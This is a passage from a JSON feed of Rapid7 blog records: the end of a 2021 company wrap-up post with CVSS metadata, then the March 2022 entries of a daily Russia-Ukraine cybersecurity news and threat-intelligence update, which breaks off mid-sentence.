[CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>)\n\n## Research and policy highlights\n\nThat's not all our Research team was up to in 2021. They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.\n\n * We published several reports on the state of cybersecurity, including:\n * Our [2020 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2021/03/11/introducing-the-vulnerability-intelligence-report-50-cves-that-made-headlines-in-2020/>)\n * Our latest [Industry Cyber-Exposure Report (ICER)](<https://www.rapid7.com/blog/post/2021/05/05/rapid7-releases-new-industry-cyber-exposure-report-icer-asx-200/>)\n * Our [2021 Cloud Misconfigurations Report](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>)\n * We tackled the [hot-button topic of hack back](<https://www.rapid7.com/blog/post/2021/08/10/hack-back-is-still-wack/>) and discussed whether or not the practice is, in fact, wack. (Spoiler: It is.)\n * We unpacked the implications for [cybersecurity in the US Infrastructure Bill](<https://www.rapid7.com/blog/post/2021/08/31/cybersecurity-in-the-infrastructure-bill/>).\n * We highlighted the reasons why we think the [UK's Computer Misuse Act](<https://www.rapid7.com/blog/post/2021/08/12/reforming-the-uks-computer-misuse-act/>) needs some revising.\n * We launched [Project Doppler](<https://www.rapid7.com/research/project-doppler/>), a free tool for Rapid7 customers, developed by our Research team to help organizations get better insight into their public internet exposure.\n\n## The Rapid7 family keeps growing\n\nThroughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>) the one-stop shop for your security program.\n\n * [We acquired IntSights](<https://www.rapid7.com/blog/post/2021/07/19/rapid7-acquires-intsights/>) to help organizations obtain holistic threat intelligence.\n * [We teamed up with open-source platform Velociraptor](<https://www.rapid7.com/blog/post/2021/04/21/rapid7-and-velociraptor-join-forces/>) to provide teams with better endpoint visibility.\n * [We brought Kubernetes security provider Alcide](<https://www.rapid7.com/blog/post/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/>) under the Rapid7 umbrella to add more robust cloud security capabilities to InsightCloudSec.\n\n## Industry accolades\n\nWe're always thrilled to get industry recognition for the work we do helping protectors secure their organizations \u2014 and we had a few big nods to celebrate in 2021.\n\n * Gartner once again [named us a Leader](<https://www.rapid7.com/blog/post/2021/08/23/rapid7-mdr-named-a-market-leader-again/>) in its Magic Quadrant for Managed Detection and Response (MDR).\n * We also earned recognition as a Strong Performer in the [inaugural Forrester Wave for MDR](<https://www.rapid7.com/blog/post/2021/03/24/rapid7-recognized-as-a-strong-performer-in-the-inaugural-forrester-wave-for-mdr-q1-2021/>).\n * InsightIDR was recognized by Gartner us as a [Leader in SIEM](<https://www.rapid7.com/blog/post/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/>) for the second time in a row.\n * For its 2021 Dynamic Application Security Testing (DAST) Magic Quadrant, Gartner [named us a Visionary](<https://www.rapid7.com/blog/post/2021/06/01/rapid7-named-a-visionary-in-2021-gartner-magic-quadrant-for-application-security-testing/>).\n\n## Keeping in touch\n\nClearly, we had a pretty busy 2021 \u2014 and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.\n\n * Listen to the [latest season of Security Nation](<https://www.rapid7.com/blog/series/security-nation/security-nation-season-4/>), our podcast where we chat with amazing guests from all corners of the security community. Season 5 launches later this month!\n * Put the finishing touches on your cybersecurity program for the coming year with insights from our [2022 Planning series](<https://www.rapid7.com/blog/tag/2022-planning/>).\n * Get better acquainted with the latest application security threats with our series on the [OWASP Top 10 for 2021](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>).\n * Read up on why [InsightIDR was XDR before it was cool to be XDR](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>).\n\nStay tuned for more great content, research, and much more in 2022!\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-01-05T18:52:41", "type": "rapid7blog", "title": "Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2021-1675", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-34527", "CVE-2021-3546", "CVE-2021-36934", "CVE-2021-44228"], "modified": "2022-01-05T18:52:41", "id": "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "href": "https://blog.rapid7.com/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T21:28:40", "description": "![Russia-Ukraine Cybersecurity Updates](https://blog.rapid7.com/content/images/2022/03/ru-security-updates.jpg)\n\nCyberattacks are a distinct concern in the [Russia-Ukraine conflict](<https://www.rapid7.com/blog/tag/russia-ukraine-conflict/>), with the potential to impact individuals and organizations far beyond the physical frontlines. With events unfolding rapidly, we want to provide a single channel by which we can communicate to the security community the major cyber-related developments from the conflict each day.\n\nEach business day, we will update this blog at 5 pm EST with what we believe are the need-to-know updates in cybersecurity and threat intelligence relating to the Russia-Ukraine conflict. We hope this blog will make it easier for you to stay current with these events during an uncertain and quickly changing time.\n\n* * *\n\n## March 16, 2022\n\nUkrainian President Volodymyr Zelenskyy [delivered a virtual speech](<https://www.nbcnews.com/politics/congress/zelenskyy-expected-press-us-military-support-address-congress-rcna20088>) to US lawmakers on Wednesday, asking again specifically for a no-fly zone over Ukraine and for additional support. \n\nThe White House released a new [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/16/fact-sheet-on-u-s-security-assistance-for-ukraine/>) detailing an additional $800 million in security assistance to Ukraine. \n\n**Threat Intelligence Update**\n\n * ******UAC-0056 targets Ukrainian entities******\n\nSentinelOne researchers reported that UAC-0056 targeted Ukrainian entities using a malicious Python-based package, masquerading as a Ukrainian language translation software. Once installed, the fake app deployed various malware, such as Cobalt Strike, GrimPlant, and GraphSteel.\n\n_Source: [Sentinel One](<https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/>)_\n\n * ******A ****h****acker was caught routing calls to Russian troops******\n\nThe Security Service of Ukraine claimed to have arrested a hacker that helped deliver communications from within Russia to the Russian troops operating in the Ukrainian territory. The hacker also sent text messages to\n\nUkrainian security officers and civil servants, exhorting them to surrender.\n\n_Source: [The Verge](<https://www.theverge.com/2022/3/15/22979381/phone-relay-capture-russia-military-unencrypted-communications-ukraine>)_\n\n## March 15, 2022\n\nThe Ukrainian Ministry of Defense [leaked documents](<https://www.scmagazine.com/analysis/breach/in-a-first-ukraine-leaks-russian-intellectual-property-as-act-of-war>) of a Russian nuclear power plant. This may be the first-ever instance of a hack-and-leak operation to weaponize the disclosure of intellectual property to harm a nation.\n\nResearchers at INFOdocket, a subsidiary of [Library Journal](<https://en.wikipedia.org/wiki/Library_Journal>), have [created](<https://www.infodocket.com/2022/03/10/briefings-reports-and-updates-about-the-conflict-in-ukraine-from-the-congressional-research-service-european-parliament-research-service-and-uk-house-of-commons-library/>) a compendium of briefings, reports, and updates about the conflict in Ukraine from three research organizations: Congressional Research Service (CRS), European Parliament Research Service (EPRS), and the UK House of Commons Library. The resource will be updated as each of the three organizations releases relevant new content.\n\nThe Wall Street Journal [is reporting](<https://www.wsj.com/articles/russian-prosecutors-warn-western-companies-of-arrests-asset-seizures-11647206193>) that Russian prosecutors have issued warnings to Western companies in Russia, threatening to arrest corporate leaders there who criticize the government or to seize assets of companies that withdraw from the country. \n\nRussia may [default on $117 million (USD) in interest payments](<https://qz.com/2142075/sanctions-are-likely-to-force-russia-to-default-on-foreign-debt/>) on dollar-denominated bonds due to Western sanctions, the first foreign debt default by Russia since 1918.\n\nReuters is [reporting](<https://www.usnews.com/news/world/articles/2022-03-14/russian-delegation-suspends-participation-in-council-of-europe-body-ria>) that Russia's delegation to the Parliamentary Assembly of the Council of Europe (PACE) is suspending its participation and will not take part in meetings. \n\nCNN [reports](<https://www.cnn.com/europe/live-news/ukraine-russia-putin-news-03-15-22/h_3f0d63658ac5c2875ed265df00ba8b40>) that Russia has imposed sanctions against US President Joe Biden, his son, Secretary of State Antony Blinken, other US officials, and \u201cindividuals associated with them,\u201d the Russian Foreign Ministry said in a statement on Tuesday.\n\n**Threat Intelligence Update**\n\n * ******Russian ****s****tate-****s****ponsored ****c****yber ****a****ctors ****a****ccess ****n****etwork ****m****isconfigured with ****d****efault MFA ****p****rotocols******\n\nCISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory that details how Russian state-sponsored cyber actors accessed a network with misconfigured default multifactor authentication (MFA) protocols. The actors then exploited a critical Windows Print Spooler vulnerability, [\u201cPrintNightmare\u201d (CVE-2021-34527)](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>), to run arbitrary code with system privileges.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured>)_\n\n * ******Fake antivirus updates used to deploy Cobalt Strike in Ukraine******\n\nUkraine's Computer Emergency Response Team is warning that threat actors are distributing fake Windows antivirus updates that install Cobalt Strike and other malware. The phishing emails impersonate Ukrainian government agencies offering ways to increase network security and advise recipients to download \"critical security updates,\" which come in the form of a 60 MB file named \"BitdefenderWindowsUpdatePackage.exe.\"\n\n_Source: [BleepingComputer/CERT-UA](<https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/amp/>)_\n\n * ******A ****n****ovel ****w****iper ****t****argets Ukrainian ****e****ntities******\n\nCybersecurity researchers observed the new CaddyWiper malware targeting Ukrainian organizations. Once deployed, CaddyWiper destroys and overwrites the data from any drives that are attached to the compromised system. Despite being released in close proximity to other wiping malware targeting Ukraine, such as HermeticWiper and IsaacWiper, CaddyWiper does not share any significant code similarities with them and appears to be created separately.\n\n_Source:[ Bleeping Computer](<https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/amp/>)_\n\n * ******German Federal Office for Information Security ****a****gency ****i****ssues an ****a****lert for Russian ****a****ntivirus ****s****oftware Kaspersky******\n\nThe German Federal Office for Information Security agency (BSI) issued an alert urging its citizens to replace Kaspersky antivirus software with another defense solution, due to alleged ties to the Kremlin. The agency suggested Kaspersky could be used as a tool in the cyber conflict between Russia and Ukraine.\n\n_Source:[ BSI](<https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html>)_\n\n## March 14, 2022\n\nThe EU-based NEXTA media group has [reported](<https://twitter.com/nexta_tv/status/1503393046351781892?s=20&t=1tA7lZrLVe-cZpHb9wy2LA>) that Russia is starting to block VPN services.\n\nBermuda\u2019s aviation regulator [said](<https://financialpost.com/pmn/business-pmn/bermuda-revokes-licenses-for-russian-operated-planes-over-safety-concerns>) it is suspending certification of all Russian-operated airplanes registered in the British overseas territory due to international sanctions over the war in Ukraine, in a move expected to affect more than 700 planes.\n\nThe Washington Post [reported](<https://www.washingtonpost.com/world/2022/03/12/russia-putin-google-apple-navalny/>) that Federal Security Service (FSB), Russian Federalnaya Sluzhba Bezopasnosti, agents approached Google and Apple executives with requests to remove apps created by activist groups.\n\nAmnesty International [said](<https://www.amnesty.org/en/latest/news/2022/03/russia-authorities-block-amnesty-internationals-russian-language-website/>) Russian authorities have blocked their Russian-language website. \n\n**Threat Intelligence Update**\n\n * ******Anonymous claims to hack Rosneft, German subsidiary of Russian energy******\n\nAnonymous claimed to hack the German branch of the Russian energy giant Rosneft, allegedly stealing 20 TB of data. The company systems were significantly affected by the attack, although there currently seems to be no effect on the company's energy supply.\n\n_Source:[ Security Affairs](<https://securityaffairs.co/wordpress/129052/hacktivism/anonymous-hacked-german-subsidiary-rosneft.html>)_\n\n * ******Russia blocks access to Instagram nationwide******\n\nRussia's Internet moderator Roskomnadzor decided to block Instagram access in the country, following Meta's decision to allow \"calls for violence against Russian citizens.\" The federal agency gave Instagram users 48 hours to prepare and finally completed the act on March 13. The blocking of Instagram follows the former ban of Facebook and Twitter in Russia last week.\n\n_Source:[ Cyber News](<https://cybernews.com/cyber-war/instagram-is-no-longer-accessible-in-russia/?utm_source=youtube&utm_medium=cn&utm_campaign=news_CNN_047_instagram_blocked_in_russia&utm_term=2v1_yubOBMc&utm_content=direct_article>)_\n\n## March 11, 2022\n\nPresident Biden, along with the European Union and the Group of Seven Countries, [moved](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/11/fact-sheet-united-states-european-union-and-g7-to-announce-further-economic-costs-on-russia/>) to revoke \u201cmost favored nation\u201d trade status for Russia, deny borrowing privileges at multilateral financial institutions, apply sanctions to additional Russian elites, ban export of luxury goods to Russia, and ban US import of goods from several signature sectors of Russia\u2019s economy.\n\n**Threat Intelligence Update**\n\n * **Amid difficulties with renewing certificates, Russia has created its own trusted TLS certificate authority**\n\nSigning authorities based in countries that have imposed sanctions on Russia can no longer accept payments for their services, leaving many sites with no practical means to renew expiring certificates. As a result, the Russian Ministry of Digital Development announced the availability of domestic certificates, replacing expired or revoked foreign certificates.\n\n_Source: [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>)_\n\n * ******Triolan, ****a**** major Ukrainian internet service provider****,**** was hacked \u2014 twice******\n\nTriolan, a Ukraine-based ISP with more than half a million subscribers, was reportedly hacked initially on February 24th, with a second attack hitting on March 9th. The company reported that the threat actors managed to hack into key components of the network, some of which couldn\u2019t be recovered.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/10/cyberattack-on-major-ukraine-internet-provider-causes-major-outages/?sh=768d17596573>)_\n\n## March 10, 2022\n\nBy [order of President Putin](<https://twitter.com/KevinRothrock/status/1501935395092631556?s=20&t=TvFRrQvNfQ6OL3qvFJePQg>), Russia\u2019s Economic Development Ministry has drafted a bill that would effectively nationalize assets and businesses \"abandoned\" in Russia by foreign corporations. Management of these seized assets will be entrusted to the VEB.RF state development corporation and to Russia\u2019s Deposit Insurance Agency.\n\nRussia has [effectively legalized patent theft](<http://publication.pravo.gov.ru/Document/View/0001202203070005?index=0&rangeSize=1>) from anyone affiliated with countries \u201cunfriendly\u201d to it, declaring that unauthorized use will not be compensated. The Russian news agency Tass has [further reporting](<https://tass.ru/ekonomika/13982403>) on this, as does the [Washington Post](<https://www.washingtonpost.com/business/2022/03/09/russia-allows-patent-theft/>).\n\nGoldman Sachs Group Inc [announced it was closing its operations in Russia](<https://www.reuters.com/business/finance/goldman-sachs-exit-russia-bloomberg-news-2022-03-10/>), becoming the first major Wall Street bank to exit the country following Moscow's invasion of Ukraine.\n\nUK Foreign Secretary Liz Truss [announced](<https://www.gov.uk/government/news/abramovich-and-deripaska-among-seven-oligarchs-targeted-in-estimated-15bn-sanction-hit>) a full asset freeze and travel ban on seven of Russia\u2019s wealthiest and most influential oligarchs, whose business empires, wealth, and connections are closely associated with the Kremlin.\n\nUS Vice President Kamala Harris [announced](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/10/vice-president-kamala-harris-announces-additional-u-s-funding-to-respond-to-humanitarian-needs-in-ukraine-and-eastern-europe/>) nearly $53 million in new humanitarian assistance from the United States government, through the US Agency for International Development (USAID), to support innocent civilians affected by Russia\u2019s invasion of Ukraine.\n\nThe International Atomic Energy Agency (IAEA) [provided an update](<https://www.iaea.org/newscenter/pressreleases/update-17-iaea-director-general-statement-on-situation-in-ukraine>) on the situation at the Chernobyl Nuclear Power Plant. The IAEA Director General said that the Agency is aware of reports that power has now been restored to the site and is looking for confirmation. At the same time, Ukraine informed them that today it had lost all communications with the facility. The IAEA has assured the international community that there has been \u201cno impact on essential safety systems.\u201d\n\n**Threat Intelligence Update**\n\n * **New malware variant targeting Russia named RURansom**\n\nRURansom is a malware variant that was recently discovered and appears to be targeting Russia. While it was initially suspected of being a ransomware, further analysis suggests it is actually a wiper. So far, no active non-Russian targets have been identified, likely due to the malware targeting specific entities.\n\n_Source: [TrendMicro](<https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html>)_\n\n_Available in Threat Library as: RURansom_\n\n * ******Kaspersky source code leak seems to be just a collection of publicly available HTML files******\n\nThe hacking group NB65 claimed on social networks to have leaked source code from the Russian antivirus firm Kaspersky. However, it appears that the leaked files are nothing more than a long list of HTML files and other related, publicly available web resources.\n\n_Source: [Cybernews](<https://cybernews.com/cyber-war/long-awaited-kaspersky-leak-doesnt-seem-to-be-a-leak-at-all/>)_\n\n * ******Anonymous claims to hack Roskomnadzor, a Russian federal agency******\n\nHacktivist group Anonymous claims to have breached Roskomnadzor, a Russian federal agency responsible for monitoring, controlling, and censoring Russian mass media, leaking over 360,000 (817.5 GB) files. Based on the report, the leak contains relatively recent censored documents, dated as late as March 5, and demonstrates Russia\u2019s attempts to censor media related to the conflict in Ukraine.\n\n_Source: @AnonOpsSE via [Twitter](<https://twitter.com/AnonOpsSE/status/1501944150794506256>) _\n\n## March 9, 2022\n\n**Public policy:** Citing concerns over rising cybersecurity risks related to the Russia-Ukraine conflict, the US is poised to enact new cyber incident reporting requirements. The_ _[Cyber Incident Reporting for Critical Infrastructure Act of 2022](<https://www.congress.gov/bill/117th-congress/senate-bill/3600/text?q=%7B%22search%22%3A%5B%22s+3600%22%2C%22s%22%2C%223600%22%5D%7D&r=3&s=2>):\n\n * Will require critical-infrastructure owners and operators to report cybersecurity incidents to CISA within 72 hours of determining the incident is significant enough that reporting is required;\n * Will require critical infrastructure owners and operators to report ransomware payments to CISA within 24 hours; and\n * Is intended to give federal agencies more insight into attack trends and potentially provide early warnings of major vulnerabilities or attacks in progress before they spread.\n\nThe Bank of Russia [established](<https://www.cbr.ru/eng/press/event/?id=12744>) temporary procedures for foreign cash transactions, suspending sales of foreign currencies until September 9, 2022. Foreign currency accounts are limited to withdrawals up to $10,000 USD.\n\nThe Financial Crimes Enforcement Network (FinCEN) is [alerting all financial institutions](<https://www.fincen.gov/index.php/news/news-releases/fincen-advises-increased-vigilance-potential-russian-sanctions-evasion-attempts>) to be vigilant against efforts to evade the expansive sanctions and other US-imposed restrictions implemented in connection with the Russian Federation\u2019s further invasion of Ukraine.\n\nThe Pentagon [dismissed](<https://www.cnn.com/2022/03/08/politics/poland-jets-ukraine-russia/index.html>) Poland\u2019s offer to transfer MIG-29 fighter jets to the United States for delivery to Ukraine, stating they did not believe the proposal was \u201ctenable.\u201d\n\n**Threat Intelligence Update**\n\n * ******Multiple hacking groups target Ukrainians and other European ****a****llies via ****p****hishing ****a****ttacks******\n\nSeveral threat actors, including Fancy Bear, Ghostwriter, and Mustang Panda, have launched a large phishing campaign against Ukraine, Poland, and other European entities amid Russia's invasion of Ukraine. \n\n_Source: [The Hacker News](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>)_\n\n_Available in Threat Library as: APT28 (Fancy Bear), Ghostwriter, Mustang Panda_\n\n * ******The Conti Ransomware group resumes activity following leaks******\n\nThe Conti Ransomware group appears to have made a comeback following the [leak of its internal chats last week](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>). On March 9, Rapid7 Threat Intelligence observed renewed activity on Conti\u2019s onion site, and CISA released new IOCs related to the group on their Conti alert page.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>)_\n\n_Available in Threat Library as: Conti_\n\n * ******The Belarusian group UNC1151 targets Ukrainian organizations using MicroBackdoor malware******\n\nThe Ukrainian government has reported on a continuous cyberattack on state organizations of Ukraine using malicious software Formbook.\n\n_Source: [Ukrainian CERT](<https://cert.gov.ua/article/37626>)_\n\n_Available in Threat Library as: UNC1151_\n\n## March 8, 2022\n\nThe US [announced](<https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/08/executive-order-on-use-of-project-labor-agreements-for-federal-construction-projects-2/>) a ban on imports of Russian oil, gas, and other energy products. New US investments in the Russian energy sector are also restricted. The UK [announced](<https://www.gov.uk/government/news/uk-to-phase-out-russian-oil-imports>) it would phase out Russian oil over 2022. \n\nThe International Atomic Energy Agency [published a statement](<https://www.iaea.org/newscenter/pressreleases/update-15-iaea-director-general-statement-on-situation-in-ukraine>) noting that remote data transmission from monitoring systems at Ukraine\u2019s mothballed Chernobyl nuclear power plant has been lost. No network data has been observed by internet monitoring companies since March 5, 2022.\n\nChris Chivvis, a senior fellow and director of the American Statecraft Program at the Carnegie Endowment for International Peace, has provided [an assessment](<https://carnegieendowment.org/2022/03/03/how-does-this-end-pub-86570>) of two likely trajectories in the Russia-Ukraine conflict. \n\nTwitter [announced](<https://twitter.com/AlecMuffett/status/1501282223009542151?s=20&t=tO-TNZw5ct6tZUcwyvMl4A>) they have made their social network available on the Tor Project onion service, which will enable greater privacy, integrity, trust, and availability to global users.\n\nThe Minister of Foreign Affairs of the Republic of Poland [announced](<https://www.gov.pl/web/diplomacy/statement-of-the-minister-of-foreign-affairs-of-the-republic-of-poland-in-connection-with-the-statement-by-the-us-secretary-of-state-on-providing-airplanes-to-ukraine>) they are ready to deploy \u2014 immediately and free of charge \u2014 all their MIG-29 jets to the Ramstein Air Force base and place them at the disposal of the US government.\n\nLumen [announced](<https://news.lumen.com/RussiaUkraine>) they are immediately ceasing their limited operations in Russia and will no longer provide services to local Lumen enterprise customers.\n\nMcDonald\u2019s [announced](<https://www.cnbc.com/2022/03/08/mcdonalds-will-temporarily-close-850-restaurants-in-russia-nearly-2-weeks-after-putin-invaded-ukraine.html>) they have temporarily closed 850 restaurants in Russia in response to Russia\u2019s attack on Ukraine.\n\nStarbucks [has announced](<https://www.cnbc.com/2022/03/08/starbucks-suspends-all-business-in-russia-as-putins-forces-attack-ukraine.html>) they will be suspending all business in Russia in response to Russia\u2019s attack on Ukraine.\n\n**Threat Intelligence Update**\n\n * ******52 US organizations were impacted by RagnarLocker ransomware****,**** including critical infrastructures******\n\nThe FBI reported that as of January 2021, 52 US-based organizations, some related to critical infrastructure, were affected by RagnarLocker ransomware. The industries affected include manufacturing, energy, financial services, government, and information technology. The malware code excludes execution on post-Soviet Union countries, including Russia, based on a geolocation indicator embedded in its code.\n\n_Source: [FBI FLASH](<https://www.ic3.gov/Media/News/2022/220307.pdf>) _\n\n_Available in Threat Library as: Ragnar Locker_\n\n * ******US energy companies were attacked prior to the Russian invasion to Ukraine******\n\nDuring a two-week blitz in mid-February, hackers received access to dozens of computers belonging to multiple US-based energy companies, including [Chevron Corp.](<https://www.bloomberg.com/quote/CVX:US>), [Cheniere Energy Inc.](<https://www.bloomberg.com/quote/LNG:US>), and [Kinder Morgan Inc](<https://www.bloomberg.com/quote/KMI:US>). The companies were attacked in parallel to the Russian invasion of Ukraine.\n\n_Source: [Bloomberg](<https://www.bloomberg.com/news/articles/2022-03-07/hackers-targeted-u-s-lng-producers-in-run-up-to-war-in-ukraine>)_\n\n * **European officials were hacked by Chinese threat actors amid the conflict in Ukraine**\n\nAccording to Google and Proofpoint, a cyberattack was launched by the Chinese hacking group Mustang Panda and its affiliated group RedDelta, which usually targets Southeast Asian countries. The groups managed to gain access to an unidentified European NATO-member email account and spread malware to other diplomatic offices.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/08/chinese-hackers-ramp-up-europe-attacks-in-time-with-russia-ukraine-war/?sh=6077d22f5ee1>)_\n\n_Available in Threat Library as: Mustang Panda_ \n\n\n * ******#OpAmerica: DEVLIX_EU, a pro-Russian hacktivist group, and its affiliates claim to have gained access to terabytes of US sensitive data ******\n\nThe group claims they have obtained access to 92TB of data related to the US Army. According to the group, they also hacked into four of the biggest \u201chosts\u201d in the US and 49 TB of data. As of now, there is no real evidence for the attack provided by the group.\n\n_Source: @Ex_anon_W_hater via [Twitter](<https://twitter.com/Ex_anon_W_hater/status/1500858398664888325>)_\n\n## March 7, 2022\n\nNetflix, KPMG, PwC, and EY have [cut ties with local units in Russia,](<https://www.reuters.com/business/netflix-kpmg-pwc-amex-sever-ties-with-russia-2022-03-06/>) and Danone suspended investments in Russia.\n\nThe Russian government has [published a list of foreign states](<https://www.jpost.com/international/article-700559>) that have committed \u201cunfriendly actions\u201d against \u201cRussia, Russian companies, and citizens.\u201d Countries listed include Australia, Albania, Andorra, the United Kingdom, the member states of the European Union, Iceland, Canada, Liechtenstein, Micronesia, Monaco, New Zealand, Norway, Republic of Korea, San Marino, North Macedonia, Singapore, USA, Taiwan, Ukraine, Montenegro, Switzerland, and Japan.\n\nThe Russian government\u2019s Ministry of Digital [issued orders](<https://www.kommersant.ru/doc/5249500>) for all government websites to use only domestic hosting providers and DNS. They further instructed agencies to discontinue using non-Russian third-party tooling, such as Google Analytics.\n\nTikTok is [suspending content from Russia](<https://www.buzzfeednews.com/article/krystieyandoli/tiktok-russia-suspending-media>) in response to the country cracking down on reporting about the invasion of Ukraine.\n\n**Threat Intelligence Update**\n\n * **Anonymous-affiliated threat actor claims to have hacked and shut down water infrastructure in Russia**\n\nThe AnonGhost group claims to have hacked and shut down two Russian SCADA water supply systems impacting the Russian cities: Volkhov, Boksitogorsk, Luga, Slantsevsky, Tikhvinsky, and Vyborg.\n\n_Source: @darkowlcyber via [Twitter](<https://twitter.com/darkowlcyber/status/1500552186735910915?s=20&t=zXmKgw6Om_VQMHa6XmN6RQ>)_\n\n_Available in Threat Library as: AnonGhost (for Threat Command customers who want to learn more)_ \n\n\n * **Anonymous claims to hack Russian TV services to broadcast footage of the war with Ukraine**\n\nRussian live TV channels Russia 24, Channel One, and Moscow 24, as well as Wink and Ivi, Netflix like services, have been hacked to broadcast footage of the war with Ukraine according to Anonymous.\n\n_Source: @YourAnonNews via [Twitter](<https://twitter.com/YourAnonNews/status/1500613013510008836?s=20&t=qgOO0Uu5T2UrkqdbjEJeAg>)_\n\n## March 4, 2022\n\nThe NATO Cooperative Cyber Defence Center of Excellence (CCDCOE) announced that [Ukraine will join the group](<https://news.yahoo.com/ukraine-join-nato-cyber-defence-171835083.html>) as a \u201ccontributing participant,\u201d indicating that \u201cUkraine could bring valuable first-hand knowledge of several adversaries within the cyber domain to be used for research, exercises, and training.\u201d\n\nUkraine\u2019s deputy chief of their information protection service [noted in a Friday briefing](<https://www.bloomberg.com/news/articles/2022-03-04/ukraine-s-hacker-army-said-to-be-helped-by-400-000-supporters>) that over 400,000 individuals have volunteered to help a crowdsourced Ukrainian government effort to disrupt Russian government and military targets.\n\n**Threat Intelligence Update**\n\n * ******Russia blocked access to social media platforms and Western news sites******\n\nRussia has prevented its residents access to information channels, including Facebook, Twitter, Western news sites such as the BBC, and app stores. With that, the BBC is now providing access to its website via the Dark Web and has reinstated their BBC shortwave broadcast service.\n\n_Source: [Reuters](<https://www.reuters.com/business/russias-offer-foreign-firms-stay-leave-or-hand-over-keys-2022-03-04/>)_\n\n * **Anonymous-affiliated threat actor hacked and leaked data from the Russian Federal State Budgetary Institution of Science**\n\nThe Russian Federal Guard Service of the Russian Federation was hacked by Anonymous. The hacker published leaked names, usernames, emails, and hashed passwords of people from the institution.\n\n_Source: @PucksReturn via [Twitter](<https://twitter.com/PucksReturn/status/1499757796526542855?s=20&t=LQqanSu2v7L5ONAkpZT1PA>)_\n\n * **Anonymous takes down multiple Russian government websites**\n\nAnonymous claims responsibility for the takedown of a large number of Russian Government websites including one of the main government websites, gov.ru. Most of the websites are still down as of Friday afternoon, March 4.\n\n_Source: @Anonynewsitaly via [Twitter](<https://twitter.com/Anonynewsitaly/status/1499488100405362694?s=20&t=92-u27VSsZLoTAz1KtuOKA>)_\n\n## March 3, 2022\n\n**Additional sanctions:** The US Treasury Dept. [announced another round of sanctions](<https://home.treasury.gov/news/press-releases/jy0628>) on Russian elites, as well as many organizations it characterized as outlets of disinformation and propaganda.\n\n**Public policy:** The Russia-Ukraine conflict is adding momentum to cybersecurity regulatory actions. Most recently, that includes\n\n * **[Incident reporting law](<https://www.hsgac.senate.gov/media/majority-media/senate-passes-peters-and-portman-landmark-legislative-package-to-strengthen-public-and-private-sector-cybersecurity->): **Citing the need to defend against potential retaliatory attacks from Russia, the US Senate passed a bill to require critical infrastructure owners and operators to report significant cybersecurity incidents to CISA, as well as ransomware payments. The US House is now considering fast-tracking this bill, which means it may become law quite soon.\n * **[FCC inquiry on BGP security](<https://www.fcc.gov/document/fcc-launches-inquiry-internet-routing-vulnerabilities>): **\u201c[E]specially in light of Russia\u2019s escalating actions inside of Ukraine,\u201d FCC seeks comment on vulnerabilities threatening the Border Gateway 